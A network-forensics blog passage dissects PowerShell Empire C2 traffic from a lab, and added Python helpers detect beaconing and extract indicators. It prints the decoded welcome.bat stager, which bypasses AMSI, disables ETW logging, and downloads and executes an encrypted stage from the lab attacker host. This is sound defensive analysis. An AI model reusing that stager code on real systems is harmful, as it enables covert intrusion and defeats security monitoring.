Wednesday, February 2, 2022

Beginning PowerShell Empire - Packet Analysis

Now that I have a better understanding of PowerShell Empire through the lens of the attack and the logs, it is time to take a look at the packets as they flew by on the wire.

The following capture was set up while the activity was being performed. Note, I'm not attempting to decrypt the traffic; I'm just trying to understand what is occurring. At the same time, I have a link in the references that guides you on how to decrypt the communication if needed.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tcpdump -nnti eth0 'host 10.0.0.110 and not arp and not net 224.0.0 and not port 138' -w empire-full-session.pcap  -vv
tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
Got 0

Looking at the first few packets during the connection stage. Knowing this communication is being done over HTTP, let's see what some of this connection looks like from the perspective of the compromised machine at 10.0.0.110.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(ip.src == 10.0.0.110) and (tcp.port == 443)' -T fields -e http.request.method -e http.request.uri -e http.cookie_pair -e http.user_agent -E header=y | sort | uniq | more

http.request.method     http.request.uri        http.cookie_pair        http.user_agent
GET     /admin/get.php  session=Drp0SxpkTTJ2bKqW0zzPUVV1g2Y=    Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
GET     /news.php       SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=   securitynik-launcher-bat-User-Agent
POST    /news.php               securitynik-launcher-bat-User-Agent

Adding the frame time field

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(ip.src == 10.0.0.110) and (tcp.port == 443)' -T fields -e frame.time -e http.request.method -e http.request.uri -e http.cookie_pair -e http.user_agent -E header=y | sort | uniq | more
frame.time      http.request.method     http.request.uri        http.cookie_pair        http.user_agent
Nov 20, 2021 13:03:59.632366000 EST     GET     /news.php       SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=   securitynik-launcher-bat-User-Agent
Nov 20, 2021 13:04:02.701118000 EST     POST    /news.php               securitynik-launcher-bat-User-Agent
Nov 20, 2021 13:04:03.514507000 EST     POST    /news.php               securitynik-launcher-bat-User-Agent
Nov 20, 2021 13:05:06.697535000 EST     GET     /admin/get.php  session=Drp0SxpkTTJ2bKqW0zzPUVV1g2Y=    Mozilla/5.0 (Windows NT 6.1; WOW6

Looks like the first few packets were GET and POST requests for news.php. Finally we see a request for admin/get.php.

Taking a look from the perspective of the attacker's machine (10.0.0.107) to see what was returned.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(ip.src == 10.0.0.107)' -T fields -e http.response.code -e http.server -e http.content_length_header -e http.response_for.uri -e http.cache_control -E header=y | sort | uniq | more
http.response.code      http.server     http.content_length_header      http.response_for.uri   http.cache_control
200     Microsoft-IIS/7.5       1279    http://10.0.0.107:443/admin/get.php     no-cache, no-store, must-revalidate
200     Microsoft-IIS/7.5       256     http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
200     Microsoft-IIS/7.5       44506   http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
200     Microsoft-IIS/7.5       5452    http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate

Adding the frame time.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(ip.src == 10.0.0.107)' -T fields -e frame.time -e http.response.code -e http.server -e http.content_length_header -e http.response_for.uri -e http.cache_control -E header=y

frame.time      http.response.code      http.server     http.content_length_header      http.response_for.uri   http.cache_control
Nov 20, 2021 13:03:59.708871000 EST     200     Microsoft-IIS/7.5       5452    http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
Nov 20, 2021 13:04:02.931861000 EST     200     Microsoft-IIS/7.5       256     http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
Nov 20, 2021 13:04:03.628589000 EST     200     Microsoft-IIS/7.5       44506   http://10.0.0.107:443/news.php  no-cache, no-store, must-revalidate
Nov 20, 2021 13:05:06.756213000 EST     200     Microsoft-IIS/7.5       1279    http://10.0.0.107:443/admin/get.php     no-cache, no-store, must-revalidate


The server returned a 200 response code for the various requests. It looks like the final news.php request was the largest, with 44506 bytes. Let's peek into this to see what it might be.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -Y '(http.content_length_header == 44506)' -V  | more 
...

Line-based text data: text/html (351 lines)
     [truncated])�qX$J�iYQ���\017���(\026�����*�4\006n��q)x<k\017:\000 �9�������e��^��SHΦ����f��[��R��o$���\016%��kڸ�[�h�k\004�\000�P\020
gU�`
    �J���2-�y\v;�T�a\r
    �+P�X�\t�\0201�����{�x��\004��\003��Q��[VW�E���qi8�Pk�w0\000+�b�)�{�=��!&�*y�R��F���}��\r
     [truncated]�\034έ�G4c�@�k\a�ь�&eϙ��^�0'c\026\f`\032R.5�(^�\021\u07B5�$��8\006\024ί�{(���\022k�mO��_��\024��vI�e ���q�l��d�\017"(&�@\
022�\025�\026;z-E�]a�]Q
     [truncated]\033��\�a�\t\035���8�\f�\016[\�0�C\004�\032�\036Ƃ��w�2�!�-\��n)�#n��q���#>��\v���\025�+\035`�\033x���\021�\005��H�K�m#`Hw
...

Definitely does not look like line-based text.

I also noticed Tshark reporting the following:

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad -t ad -q -z expert,warns
Warns (8)
=============
   Frequency      Group           Protocol  Summary
           8   Security               HTTP  Unencrypted HTTP protocol detected over encrypted port, could indicate a dangerous misconfiguration.

Looking at the cookie information.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad  -T fields -e frame.time -e ip.src -e ip.dst -e http.cookie_pair  -E header=y | more  
frame.time      ip.src  ip.dst  http.cookie_pair
Nov 20, 2021 13:03:59.632366000 EST     10.0.0.110      10.0.0.107      SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=
Nov 20, 2021 13:05:06.697535000 EST     10.0.0.110      10.0.0.107      session=Drp0SxpkTTJ2bKqW0zzPUVV1g2Y=

I was hoping to see the same cookie. When I add the http.request.uri field, it seems the difference is between requesting news.php vs admin/get.php.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-initial-connect.pcap -t ad  -T fields -e frame.time -e ip.src -e ip.dst -e http.cookie_pair -e http.request.uri -E header=y | more
frame.time      ip.src  ip.dst  http.cookie_pair        http.request.uri
Nov 20, 2021 13:03:59.632366000 EST     10.0.0.110      10.0.0.107      SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=   /news.php
Nov 20, 2021 13:05:06.697535000 EST     10.0.0.110      10.0.0.107      session=Drp0SxpkTTJ2bKqW0zzPUVV1g2Y=    /admin/get.php

Looking at the packets when whoami was run from within the PowerShell Empire interactive environment, we see the following.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-whoami.pcapng -t ad  -T fields -e frame.number -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.content_length_header -E header=y | more 
frame.number    ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.content_length_header
1       10.0.0.110      1650    10.0.0.107      443     GET     /news.php
5       10.0.0.107      443     10.0.0.110      1650                    78
9       10.0.0.110      1650    10.0.0.107      443     POST    /login/process.php      94
14      10.0.0.107      443     10.0.0.110      1650                    1279

I'm going to assume (for now) that packet 5 is the server sending the request and packet 9 is the client providing the response to whoami via the POST /login/process.php.

When the ps command is executed, I do not see login/process.php but once again news.php. Is it possible these files are being cycled through?

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -T fields -e frame.number -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.content_length_header -e http.response.code -E header=y | more 
frame.number    ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.content_length_header       http.response.code
4       10.0.0.107      443     10.0.0.110      1650                    62      200
7       10.0.0.110      1650    10.0.0.107      443     POST    /news.php       8078
12      10.0.0.107      443     10.0.0.110      1650                    1279    200

Looks like the PowerShell Empire server sends the request to the client in packet 4 in an HTTP 200 OK response message, and gets a response back via a POST /news.php in packet 7. Interestingly, packet 8 reports the page is not found.

Looking at frame 4, we see the following.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 4'                                                       
    4 2021-11-20 14:36:15.708022   10.0.0.107 → 10.0.0.110   HTTP 324 HTTP/1.1 200 OK  (text/html)

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 4' -T fields -e http.file_data
���\r���7N���R-S���V���k&��Y4ULYJ����`[=�������j.F+��{'0�Vy��

Looking at the response in frame 5, we see the following.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 7'
    7 2021-11-20 14:36:26.478808   10.0.0.110 → 10.0.0.107   HTTP 8132 POST /news.php HTTP/1.1 

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 7' -T fields -e http.file_data
����m���!'�����%�#�6��������\to�A�0I�����-���8/��a���0�p����opfn{|\n.[�d�~\fh����S�����C�=6\tk��~�h�����{�}��"�qJDj`:�Bd���Z��'K%R�s\n[��$���}d��

Finally, in frame 12, we see the following.

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 12' 
   12 2021-11-20 14:36:26.519843   10.0.0.107 → 10.0.0.110   HTTP 83 HTTP/1.1 200 OK  (text/html)

┌──(root💀securitynik)-[/home/securitynik/packets]
└─# tshark -n -r empire-ps -t ad  -Y 'frame.number == 12' -T fields -e http.file_data
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style ...... <h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n  <h2>404 - File or directory not found.</h2>\r\n  <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n      

There are truly a lot of these messages in the communication. 

Going forward, this analysis will focus on what I see overall and not on the results of a specific command. We would only benefit from the output of a specific command if we were to decrypt the communication. Since I'm looking at this from a general perspective, I will keep it simple moving forward.

So we saw a lot above, but nothing that really helped us look deeply into the activities. We can infer, but we cannot confirm.

Therefore, let's look back at a snapshot of welcome.bat, which represents the PowerShell stager, to understand what is going on inside this content.

┌──(root💀securitynik)-[/tmp]
└─# cat welcome.bat 
# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -nol -nop -ep bypass "[IO.File]::ReadAllText('%~f0')|iex" & DEL "%~f0" & POPD /B
powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwBTAEUAbQBCAGwAWQAuAEcARQB0AFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpACcAKwAnAFUAdABpAGwAcwAnACkAOwAkAFIARQBmAC4ARwBFAFQARgBpAEUATABEACgAJwBhAG0AcwBpAEkAbgBpAHQARg...ALgAkAGQAYQB0AGEALgBsAGUATgBHAHQAaABdADsALQBqAE8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Looking above, we see the content is base64 encoded. Let's attempt to decode it using base64 --decode.

┌──(root💀securitynik)-[/tmp]
└─# echo "SQBmACgAJABQAFMAVgBFAFIAUwBpAG8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBpAG8ATgAuAE0AYQBKAG8AUgAgAC0AZwBFACAAMwApAHsAJABSAEUARgA9AFsAUgBFAGYAXQAuAEEAcwB...AoACYAIAAkAFIAIAAkAGQAYQBUAGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" | base64 --decode
If($PSVERSioNTaBlE.PSVErsioN.MaJoR -gE 3){$REF=[REf].AsSEmBlY.GEtTyPE('System.Management.Automation.Amsi'+'Utils');$REf.GETFiELD('amsiInitF'+'ailed','NonPublic,Static').SEtValUE($NUlL,$True);[System.Diagnostics.Eventing.EventProvider]."GetFie`ld"('m_e'+'nabled','Non'+'Public,'+'Instance').SetValue([Ref].Assembly.GetType('Syste'+'m.Management.Automation.Tracing.PSE'+'twLogProvider')."GetFie`ld"('et'+'wProvider','NonPub'+'lic,S'+'tatic').GetValue($null),0);};[SysTEM.NeT.SerVicePOiNtManAGER]::EXPeCt100COnTINUE=0;$b48e=NeW-ObJECT SystEM.NET.WebCLIent;$u='securitynik-launcher-bat-User-Agent';$ser=$([TEXT.ENCoDInG]::UniCODe.GETStriNg([ConvErT]::FRoMBaSe64StrING('aAB0AHQAcAA6AC8ALwAxADAALgAwAC4AMAAuADEAMAA3ADoANAA0ADMA')));$t='/news.php';$b48e.HeadeRS.AdD('User-Agent',$u);$B48e.PRoXy=[SYsTem.Net.WEBREqUesT]::DefAULTWEbPrOXy;$b48e.ProXy.CredeNTiALS = [SYSTEM.NET.CrEdeNTIaLCaChe]::DEfaultNETWorKCReDentIals;$Script:Proxy = $b48e.Proxy;$K=[SYsTEm.TeXT.ENcODInG]::ASCII.GeTBYtes('?4M6q)cLnvli}UCsu:rwf![~]79{#=O/');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$B48E.HeadeRs.Add("Cookie","SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=");$datA=$B48e.DownLOaDDaTA($sEr+$T);$Iv=$DaTa[0..3];$DAtA=$daTa[4..$data.leNGth];-jOIn[CHaR[]](& $R $daTa ($IV+$K))|IEX

Good stuff! We have peeled back the first layer of the onion. From above, we see some cleartext values that make sense, while also seeing what seems to be further base64 encoded content, such as:

:FRoMBaSe64StrING('aAB0AHQAcAA6AC8ALwAxADAALgAwAC4AMAAuADEAMAA3ADoANAA0ADMA')

When we decode this new string, we see:

┌──(root💀securitynik)-[~/packets]
└─# echo 'aAB0AHQAcAA6AC8ALwAxADAALgAwAC4AMAAuADEAMAA3ADoANAA0ADMA' | base64 --decode
http://10.0.0.107:443

Good stuff, we were able to recover the URL the host should communicate with. Knowing, for example, that the request was for news.php, we can conclude this first request looked like http://10.0.0.107:443/news.php. I do find this URL interesting. I was expecting to see https rather than HTTP. However, I guess the port 443 forced the communication over https rather than HTTP.

We also see information on the cookie.

("Cookie","SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=")

Attempting to decode the Cookie, assuming it is base64, we see nothing meaningful.

┌──(root💀securitynik)-[/tmp]
└─# echo "ZOkMw8YjkW24L0AxacILe8erL8s=" | base64 --decode
d�
  ��#�m�/@1i�
             {ǫ/�

We also see the following in the decoded content.

ASCII.GeTBYtes('?4M6q)cLnvli}UCsu:rwf![~]79{#=O/')

This value ties back to the StagingKey which was defined during the setup of the Listener. It is also used as input to the encryption algorithm.
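The triage walked through above (the UTF-16LE base64 -enc argument, the nested base64 server URL, the cookie, user agent and staging key, and the $R scriptblock that RC4-decrypts the /news.php body using a 4-byte IV prefix plus the staging key) as an added Python example; this is not code from the original post or from Empire. SAMPLE_STAGER is a constructed fragment built from the values shown on this page, and the stage round-trip uses a constructed buffer because the captured response bytes are not reproduced here.

```python
import base64
import re

# Constructed fragment modelled on the decoded welcome.bat stager above: only the
# statements an analyst pulls values from, using the values shown on this page.
SAMPLE_STAGER = (
    "$u='securitynik-launcher-bat-User-Agent';"
    "$ser=$([TEXT.ENCoDInG]::UniCODe.GETStriNg([ConvErT]::FRoMBaSe64StrING("
    "'aAB0AHQAcAA6AC8ALwAxADAALgAwAC4AMAAuADEAMAA3ADoANAA0ADMA')));"
    "$t='/news.php';"
    "$K=[SYsTEm.TeXT.ENcODInG]::ASCII.GeTBYtes('?4M6q)cLnvli}UCsu:rwf![~]79{#=O/');"
    '$B48E.HeadeRs.Add("Cookie","SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=");'
)


def to_enc_arg(script: str) -> str:
    """Build what follows 'powershell -enc': base64 over the UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_enc_arg(blob: str) -> str:
    """Reverse of to_enc_arg. 'base64 --decode' alone leaves the UTF-16 NUL
    bytes in place; the terminal simply does not render them."""
    return base64.b64decode(blob).decode("utf-16-le")


def extract_indicators(script: str) -> dict:
    """Pull the C2 indicators out of a decoded stager. The .NET method names are
    randomly cased in the stager, so every pattern is case-insensitive."""
    def grab(pattern):
        m = re.search(pattern, script, re.IGNORECASE)
        return m.group(1) if m else None

    server_b64 = grab(r"frombase64string\('([A-Za-z0-9+/=]+)'\)")
    return {
        "user_agent": grab(r"\$u='([^']+)'"),
        # the server URL is itself UTF-16LE base64, exactly like the -enc blob
        "server": decode_enc_arg(server_b64) if server_b64 else None,
        "uri": grab(r"\$t='([^']+)'"),
        "staging_key": grab(r"ascii\.getbytes\('([^']+)'\)"),
        "cookie": grab(r'"Cookie","([^"]+)"'),
    }


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key schedule + keystream XOR): what the $R scriptblock does."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def unwrap_stage(staging_key: bytes, body: bytes) -> bytes:
    """What the stager does with the /news.php body: $IV = first 4 bytes,
    RC4 key = $IV + $K, and the remainder is decrypted before it reaches IEX."""
    iv, ciphertext = body[:4], body[4:]
    return rc4(iv + staging_key, ciphertext)


def wrap_stage(staging_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Inverse of unwrap_stage (RC4 is symmetric); used only to build a
    constructed test body for the round trip below."""
    return iv + rc4(iv + staging_key, plaintext)


if __name__ == "__main__":
    blob = to_enc_arg(SAMPLE_STAGER)            # what welcome.bat would carry
    found = extract_indicators(decode_enc_arg(blob))
    for name, value in found.items():
        print(f"{name:12} {value}")
    key = found["staging_key"].encode("ascii")
    body = wrap_stage(key, b"\x01\x02\x03\x04", b"Write-Host constructed stage")
    print(unwrap_stage(key, body))
```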

Digging deeper. Extracting packets 8 and 13 and taking a closer look, we see the client made a GET request for /news.php and the server responded with a 200 OK. This suggests the requested resource was received successfully.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 8) || (frame.number == 13)'                                                  
    8 2021-11-20 13:03:59.632367   10.0.0.110 → 10.0.0.107   HTTP 246 GET /news.php HTTP/1.1 
   13 2021-11-20 13:03:59.708872   10.0.0.107 → 10.0.0.110   HTTP 1336 HTTP/1.1 200 OK  (text/html)

Extracting a few fields to take a look at this from a different perspective, we see below that the client's GET request has a TCP payload length (tcp.len) of 192 bytes, while the server's HTTP response was 5452 bytes. This is a significant download.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 8) || (frame.number == 13)' -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.cookie_pair -e tcp.len -e http.content_length_header -E header=y
ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.response.code      http.cookie_pair        tcp.len http.content_length_header
10.0.0.110      1650    10.0.0.107      443     GET     /news.php               SecurityNik-HTTP-Listener-Cookie=ZOkMw8YjkW24L0AxacILe8erL8s=   192
10.0.0.107      443     10.0.0.110      1650                    200             1282    5452

Looking at frames 17 and 21, we now see the client making a POST and the server returning a 200 OK message.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 17) || (frame.number == 21)'
   17 2021-11-20 13:04:02.701119   10.0.0.110 → 10.0.0.107   HTTP 516 POST /news.php HTTP/1.1 
   21 2021-11-20 13:04:02.931862   10.0.0.107 → 10.0.0.110   HTTP 519 HTTP/1.1 200 OK  (text/html)

Expanding the fields like we did above, we see the client POST consists of 462 bytes. The server responds with 256 bytes. Attempting to look at either the bytes sent in the POST or the response will not benefit us, as we already know this traffic is encrypted.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 17) || (frame.number == 21)' -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.cookie_pair -e tcp.len -e http.content_length_header -E header=y
ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.response.code      http.cookie_pair        tcp.len http.content_length_header
10.0.0.110      1650    10.0.0.107      443     POST    /news.php                       462     462
10.0.0.107      443     10.0.0.110      1650                    200             465     256

Continuing along this path, we see in frame 25, the client makes yet another POST, sending 256 bytes, with the server responding with 200 OK in packet 42. The server sends back a massive 44506 bytes.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 25) || (frame.number == 42)'
   25 2021-11-20 13:04:03.514509   10.0.0.110 → 10.0.0.107   HTTP 260 POST /news.php HTTP/1.1 
   42 2021-11-20 13:04:03.628591   10.0.0.107 → 10.0.0.110   HTTP 5351 HTTP/1.1 200 OK  (text/html)

To get a better view of this, let's expand the fields again.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -t ad -Y '(frame.number == 25) || (frame.number == 42)' -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e http.request.method -e http.request.uri -e http.response.code -e http.cookie_pair -e tcp.len -e http.content_length_header -E header=y
ip.src  tcp.srcport     ip.dst  tcp.dstport     http.request.method     http.request.uri        http.response.code      http.cookie_pair        tcp.len http.content_length_header
10.0.0.110      1650    10.0.0.107      443     POST    /news.php                       206     206
10.0.0.107      443     10.0.0.110      1650                    200             5297    44506

According to Ayan Saha, this represents the end of the three phases the tool uses to set up.

From here on, the client sends regular GET requests, beaconing home to get the tasks it needs to execute.

Looking at the statistical analysis of the URLs requested.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap -Y '(ip.src == 10.0.0.110) && (tcp.port == 443) && (http.request.method == "GET")' -T fields -e ip.src -e http.request.uri | sort | uniq --count | sort --numeric --reverse
    563 10.0.0.110      /admin/get.php
    540 10.0.0.110      /news.php
    493 10.0.0.110      /login/process.php

Considering the above, let's look at the 60-second windows in which each of these pages is seen, starting with /admin/get.php. The primary reason for the 60-second window is that we set the delay to 60 seconds when configuring the listener.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap  -t ad -q -z io,stat,60,'(ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) && (http.request.method == GET) && (http.request.uri ==  "/admin/get.php")' | more
======================================================================================================
| IO Statistics                                                                                      |
|                                                                                                    |
| Duration: 112019.300404 secs                                                                        |
| Interval:    60 secs                                                                               |
|                                                                                                    |
| Col 1: (ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) &&                     |
|        (http.request.method == GET) && (http.request.uri ==  "/admin/get.php")                     |
|----------------------------------------------------------------------------------------------------|
|                     |1               |                                                             |
| Date and time       | Frames | Bytes |                                                             |
|--------------------------------------|                                                             |
| 2021-11-20 13:02:57 |      0 |     0 |                                                             |
| 2021-11-20 13:03:57 |      0 |     0 |                                                             |
| 2021-11-20 13:04:57 |      1 |   235 |                                                             |
| 2021-11-20 13:05:57 |      0 |     0 |                                                             |
| 2021-11-20 13:06:57 |      0 |     0 |                                                             |
| ... TRUNCATED FOR BREVITY ....                                                                     |
======================================================================================================

Above we can see a number of zero counts at these 1-minute intervals; let's remove those to get more meaningful information.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r empire-full-session.pcap  -t ad -q -z io,stat,60,'(ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) && (http.request.method == GET) && (http.request.uri ==  "/admin/get.php")' | grep --invert-match --perl-regexp "\s+0\s+" | more

======================================================================================================
| IO Statistics                                                                                      |
|                                                                                                    |
| Duration: 112019.300404 secs                                                                        |
| Interval:    60 secs                                                                               |
|                                                                                                    |
| Col 1: (ip.src==10.0.0.110) && (ip.dst == 10.0.0.107) && (tcp.dstport==443) &&                     |
|        (http.request.method == GET) && (http.request.uri ==  "/admin/get.php")                     |
|----------------------------------------------------------------------------------------------------|
|                     |1               |                                                             |
| Date and time       | Frames | Bytes |                                                             |
|--------------------------------------|                                                             |
| ...                                  |                                                             |
| 2021-11-20 13:19:57 |      1 |   235 |                                                             |
| 2021-11-20 13:30:57 |      1 |   235 |                                                             |
| 2021-11-20 17:17:57 |      1 |   235 |                                                             |
| 2021-11-20 17:18:57 |      1 |   235 |                                                             |
| 2021-11-20 17:19:57 |      2 |   470 |                                                             |
| 2021-11-20 17:20:57 |      2 |   470 |                                                             |
| 2021-11-20 17:21:57 |      2 |   470 |                                                             |
| 2021-11-20 17:22:57 |      2 |   470 |                                                             |
| 2021-11-20 17:23:57 |      1 |   235 |                                                             |
| 2021-11-20 17:24:57 |      1 |   235 |                                                             |
| 2021-11-20 17:25:57 |      1 |   235 |                                                             |
| 2021-11-20 17:26:57 |      3 |   705 |                                                             |
| 2021-11-20 17:28:57 |      3 |   705 |                                                             |
| 2021-11-20 17:29:57 |      2 |   470 |                                                             |
| 2021-11-20 17:30:57 |      1 |   235 |                                                             |
| 2021-11-20 17:31:57 |      1 |   235 |                                                             |
| 2021-11-21 19:08:57 |      1 |   235 |                                                             |
| 2021-11-21 19:09:57 |      1 |   235 |                                                             |
======================================================================================================


Looking at a snapshot of the data above, we can clearly see a pattern every 60 seconds.
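The io,stat windows above count one page at a time, and the client rotates through all three pages. The following added Python example (not the post's own tooling) parses tshark -T fields output, groups requests by host pair and destination port instead of by URI, and scores how regular the inter-request interval is; it also flags plain HTTP to port 443, which is what the tshark expert warning earlier pointed at. SAMPLE_FIELDS is constructed in that output layout with the 60-second timing described on this page, plus unrelated browsing rows for contrast.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

# Constructed sample in the layout of 'tshark -T fields -E header=y' above
# (tab separated). 10.0.0.110 -> 10.0.0.107:443 beacons about every 60 s while
# rotating the three Empire pages; the 10.0.0.50:80 rows are ordinary browsing.
SAMPLE_FIELDS = """\
frame.time\tip.src\tip.dst\ttcp.dstport\thttp.request.uri
Nov 20, 2021 17:17:10.000000000 EST\t10.0.0.110\t10.0.0.50\t80\t/index.html
Nov 20, 2021 17:17:12.000000000 EST\t10.0.0.110\t10.0.0.50\t80\t/style.css
Nov 20, 2021 17:17:57.100000000 EST\t10.0.0.110\t10.0.0.107\t443\t/admin/get.php
Nov 20, 2021 17:18:57.350000000 EST\t10.0.0.110\t10.0.0.107\t443\t/news.php
Nov 20, 2021 17:19:40.000000000 EST\t10.0.0.110\t10.0.0.50\t80\t/about.html
Nov 20, 2021 17:19:57.200000000 EST\t10.0.0.110\t10.0.0.107\t443\t/login/process.php
Nov 20, 2021 17:20:57.600000000 EST\t10.0.0.110\t10.0.0.107\t443\t/admin/get.php
Nov 20, 2021 17:21:57.150000000 EST\t10.0.0.110\t10.0.0.107\t443\t/news.php
Nov 20, 2021 17:22:57.400000000 EST\t10.0.0.110\t10.0.0.107\t443\t/login/process.php
Nov 20, 2021 17:25:03.000000000 EST\t10.0.0.110\t10.0.0.50\t80\t/contact.html
"""


def parse_frame_time(value: str) -> datetime:
    """'Nov 20, 2021 13:03:59.632366000 EST' -> datetime (zone dropped,
    nanoseconds trimmed to the microseconds strptime accepts)."""
    stamp, _zone = value.rsplit(" ", 1)
    head, frac = stamp.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def parse_fields(text: str) -> list:
    """Rows of (time, src, dst, dstport, uri) from tab-separated tshark output."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("frame.time"):   # header row
            continue
        when, src, dst, dport, uri = line.split("\t")
        rows.append((parse_frame_time(when), src, dst, int(dport), uri))
    return rows


def beacon_summary(rows: list, max_jitter: float = 0.1) -> dict:
    """Per (src, dst, dstport): inter-request deltas across all URIs, and a
    regularity score (population std-dev divided by the median interval)."""
    by_pair = defaultdict(list)
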